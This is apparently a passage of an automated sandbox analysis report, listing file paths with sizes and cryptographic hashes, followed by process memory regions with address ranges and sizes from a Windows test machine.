                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  59583cecd69c4401d92a7a17a16f194b

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  6134e6c5ec66c755f1537dd984c66b293a207a46

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  b3804330d219ae8b7ab3c7b36329b611f8e2c69e90fc86d77760b18d8428f6a6

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  084a905d9543be8af45126ff5bd40db819f7cddee9db7618eb42c1229145b944ebd8c61696ac7ec617bd0e55152931bf964b6af01018e9bfce964b4e16121e32

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  64B

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  2f56593c4c7976dc20c4b9c40a9bc20c

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  a0ad8441e69651f819c93e1459a774c346bc66d1

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  1f3711df6686fdabe769d41fda005dbbad865ce09d26715c00bc3bc385ad99e4

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  2610b3a3dd6e45d59d5b25a5cf96b77ec84bf5f1abc119f5e0c91714a3b8b2644e285bb0dbc53b27e3ee1164aba432592d0f3a3c3e26e76025e0abc17e63b8d1

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  944B

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  719fd150e78f630817910e72ad00fc16

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  093ef625bd5e314e334cffda49458cde7b8a85aa

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  17850f8bbb06ed6af4ba88f2c085dd1f3afa20f36f63dc20ad548c1ce61a9455

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  cd8b52ddf31313f77f905b2203e55ec32e65cf2f47c828d3262b9fe2ec3cc2704d112ba3574be8967b704cb0c1fbc986665b40ab85b1ad129e5bc98354c8e175

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  944B

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  dbb22d95851b93abf2afe8fb96a8e544

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  920ec5fdb323537bcf78f7e29a4fc274e657f7a4

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  e1ee9af6b9e3bfd41b7d2c980580bb7427883f1169ed3df4be11293ce7895465

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  16031134458bf312509044a3028be46034c544163c4ca956aee74d2075fbeb5873754d2254dc1d0b573ce1a644336ac4c8bd7147aba100bfdac8c504900ef3fc

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  944B

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  10890cda4b6eab618e926c4118ab0647

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  e0938b5152919b72f532371a7b36aa5c

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  2d0c9a14ce15ca56644748c88b4b271b803648fd

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  5fea813d3264505e96c6282ee6ea2fbb51eea6bf4f8650d080547cbc80e22903

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  392ce91db8eaf6d17ec1152b76f988c4147c3ca9f6a80e0b3925460b4b2bf721ed4f10cccb432dc303548d124a10b50d851acdcb171c1796b51a441cdbbb8d96

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  3df110e480ee96b0eb33e2a49b6e9c38

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  ab63f7e1cae2e3c353480cf9649ed003f297f02c

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  6e681c03c4803b75a721a4439acf24c12b774dea7c652f6feffe57466e3d056c

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  37287132e7a1cf3ee34d12db777fe1c067f79bc82dda78a9bca31880fa1937a9230d309b7dd04a541c33c8523063c038ef943673bffd36d3e276cc157383fcee

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cpgugbl4.ws2.ps1

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  60B

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                                                                • memory/316-153-0x00007FFC236B0000-0x00007FFC236C0000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                                • memory/316-152-0x0000026E741E0000-0x0000026E7420B000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  172KB

                                                                                                                                                                                                                                                                • memory/536-1-0x0000018DC99B0000-0x0000018DC99D2000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  136KB

                                                                                                                                                                                                                                                                • memory/536-12-0x00007FFC44630000-0x00007FFC450F1000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  10.8MB

                                                                                                                                                                                                                                                                • memory/536-0-0x00007FFC44633000-0x00007FFC44635000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                • memory/536-15-0x00007FFC44630000-0x00007FFC450F1000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  10.8MB

                                                                                                                                                                                                                                                                • memory/536-11-0x00007FFC44630000-0x00007FFC450F1000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  10.8MB

                                                                                                                                                                                                                                                                • memory/612-157-0x00007FFC236B0000-0x00007FFC236C0000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                                • memory/612-156-0x0000018AFBC60000-0x0000018AFBC8B000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  172KB

                                                                                                                                                                                                                                                                • memory/616-143-0x0000022FF0A80000-0x0000022FF0AAB000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  172KB

                                                                                                                                                                                                                                                                • memory/616-144-0x00007FFC236B0000-0x00007FFC236C0000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                                • memory/616-142-0x0000022FF0A50000-0x0000022FF0A74000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  144KB

                                                                                                                                                                                                                                                                • memory/676-147-0x000001D4C8D60000-0x000001D4C8D8B000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  172KB

                                                                                                                                                                                                                                                                • memory/676-148-0x00007FFC236B0000-0x00007FFC236C0000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                                • memory/960-160-0x00007FFC236B0000-0x00007FFC236C0000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                                • memory/960-159-0x0000027623FA0000-0x0000027623FCB000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  172KB

                                                                                                                                                                                                                                                                • memory/1056-168-0x000001D464A90000-0x000001D464ABB000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  172KB

                                                                                                                                                                                                                                                                • memory/1056-169-0x00007FFC236B0000-0x00007FFC236C0000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                                • memory/1148-172-0x00007FFC236B0000-0x00007FFC236C0000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                                • memory/1148-171-0x00000228082B0000-0x00000228082DB000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  172KB

                                                                                                                                                                                                                                                                • memory/1156-175-0x00007FFC236B0000-0x00007FFC236C0000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                                • memory/1156-174-0x000001BFB37D0000-0x000001BFB37FB000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  172KB

                                                                                                                                                                                                                                                                • memory/1164-178-0x00007FFC236B0000-0x00007FFC236C0000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                                • memory/1164-177-0x000001B28BE60000-0x000001B28BE8B000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  172KB

                                                                                                                                                                                                                                                                • memory/1208-180-0x000002D498740000-0x000002D49876B000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  172KB

                                                                                                                                                                                                                                                                • memory/1208-181-0x00007FFC236B0000-0x00007FFC236C0000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                                • memory/1280-183-0x000001B406FC0000-0x000001B406FEB000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  172KB

                                                                                                                                                                                                                                                                • memory/1280-184-0x00007FFC236B0000-0x00007FFC236C0000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                                • memory/1288-188-0x00007FFC236B0000-0x00007FFC236C0000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                                • memory/1288-187-0x000001F349BD0000-0x000001F349BFB000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  172KB

                                                                                                                                                                                                                                                                • memory/2648-84-0x0000021318AB0000-0x0000021318B8A000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  872KB

                                                                                                                                                                                                                                                                • memory/2648-85-0x00000213331B0000-0x000002133331E000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  1.4MB

                                                                                                                                                                                                                                                                • memory/2648-91-0x000002131A6D0000-0x000002131A6D6000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  24KB

                                                                                                                                                                                                                                                                • memory/3452-494-0x000001A74EAB0000-0x000001A74EAB6000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  24KB

                                                                                                                                                                                                                                                                • memory/3452-495-0x000001A74EAC0000-0x000001A74EACA000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  40KB

                                                                                                                                                                                                                                                                • memory/3452-493-0x000001A74EA80000-0x000001A74EA88000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  32KB

                                                                                                                                                                                                                                                                • memory/3452-492-0x000001A74EAD0000-0x000001A74EAEA000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  104KB

                                                                                                                                                                                                                                                                • memory/3452-491-0x000001A74EA70000-0x000001A74EA7A000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  40KB

                                                                                                                                                                                                                                                                • memory/3452-489-0x000001A74EA90000-0x000001A74EAAC000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  112KB

                                                                                                                                                                                                                                                                • memory/3452-487-0x000001A74E600000-0x000001A74E60A000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  40KB

                                                                                                                                                                                                                                                                • memory/3452-486-0x000001A74E870000-0x000001A74E925000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  724KB

                                                                                                                                                                                                                                                                • memory/3452-485-0x000001A74E850000-0x000001A74E86C000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  112KB

                                                                                                                                                                                                                                                                • memory/3528-101-0x00000000000C0000-0x00000000000D8000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  96KB

                                                                                                                                                                                                                                                                • memory/3712-132-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  172KB

                                                                                                                                                                                                                                                                • memory/3712-139-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  172KB

                                                                                                                                                                                                                                                                • memory/3712-133-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  172KB

                                                                                                                                                                                                                                                                • memory/3712-134-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  172KB

                                                                                                                                                                                                                                                                • memory/3712-137-0x00007FFC63630000-0x00007FFC63825000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  2.0MB

                                                                                                                                                                                                                                                                • memory/3712-138-0x00007FFC62250000-0x00007FFC6230E000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  760KB

                                                                                                                                                                                                                                                                • memory/3712-136-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  172KB

                                                                                                                                                                                                                                                                • memory/3712-131-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  172KB

                                                                                                                                                                                                                                                                • memory/4980-31-0x00007FFC44630000-0x00007FFC450F1000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  10.8MB

                                                                                                                                                                                                                                                                • memory/4980-29-0x00007FFC44630000-0x00007FFC450F1000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  10.8MB

                                                                                                                                                                                                                                                                • memory/4980-18-0x00007FFC44630000-0x00007FFC450F1000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  10.8MB

                                                                                                                                                                                                                                                                • memory/4980-17-0x00007FFC44630000-0x00007FFC450F1000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  10.8MB

                                                                                                                                                                                                                                                                • memory/5176-79-0x0000000005790000-0x00000000057F6000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  408KB

                                                                                                                                                                                                                                                                • memory/5176-78-0x0000000000E10000-0x0000000000E26000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  88KB